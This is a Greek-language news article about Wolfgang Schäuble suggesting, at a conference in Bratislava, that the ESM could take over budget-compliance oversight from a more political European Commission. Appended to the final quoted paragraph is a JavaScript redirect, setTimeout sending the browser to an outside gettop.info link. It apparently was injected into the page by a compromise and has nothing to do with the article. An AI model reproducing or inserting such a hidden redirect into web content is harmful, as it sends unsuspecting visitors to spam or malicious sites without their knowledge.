Σόιμπλε: Πολιτικός ο ρόλος της ΕΕ – Τα δημοσιονομικά στην επίβλεψη του ESM

0
12

 

Πρωτοτύπησε και πάλι με τις δηλώσεις του ο Γερμανός υπουργός Οικονομικών Βόλφγκανγκ Σόιμπλε ο οποίος μιλώντας σε συνέδριο στην Μπρατισλάβα υποστήριξε πως το ταμείο χρηματοοικονομικής διάσωσης της ευρωζώνης-ο Ευρωπαϊκός Μηχανισμός Σταθερότητας, ESM-θα μπορούσε να αποτελέσει τον κατάλληλο θεσμό για να αναλάβει από την Ευρωπαϊκή Επιτροπή ορισμένες από τις ευθύνες της για την επίβλεψη της τήρησης των προϋπολογισμών στην ευρωζώνη.

Όπως τόνισε ο κ. Σόιμπλε, όσο δεν υφίσταται μία ευρωπαϊκή νομισματική ένωση-κάτι που δήλωσε ότι δεν πρόκειται να μεταβληθεί στο προσεχές μέλλον-η Ευρωπαϊκή Επιτροπή θα μπορούσε να αναλάβει έναν περισσότερο πολιτικό ρόλο, ενώ το βάρος της επίβλεψης των δημοσιονομικών πολιτικών θα μπορούσε να το επωμισθεί ο ESM.

«Τυπικώς, η εφαρμογή εναπόκειται στην Ευρωπαϊκή Επιτροπή. Η τωρινή Επιτροπή έχει επιλέξει να έχει πιο πολιτικό ρόλο και έχει το απόλυτο δικαίωμα να το πράξει. Όμως αυτό κάνει πολύ πιο δύσκολη την αποστολή να επιβληθεί η συμμόρφωση», υπογράμμισε ο Σόιμπλε.

«Ίσως ο ESM θα μπορούσε να διαδραματίσει έναν ρόλο σε μερική σύμπραξη με την Κομισιόν για εκείνες της υποθέσεις συμμόρφωσης που αυτή δεν μπορεί να επιβάλει», πρόσθεσε. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here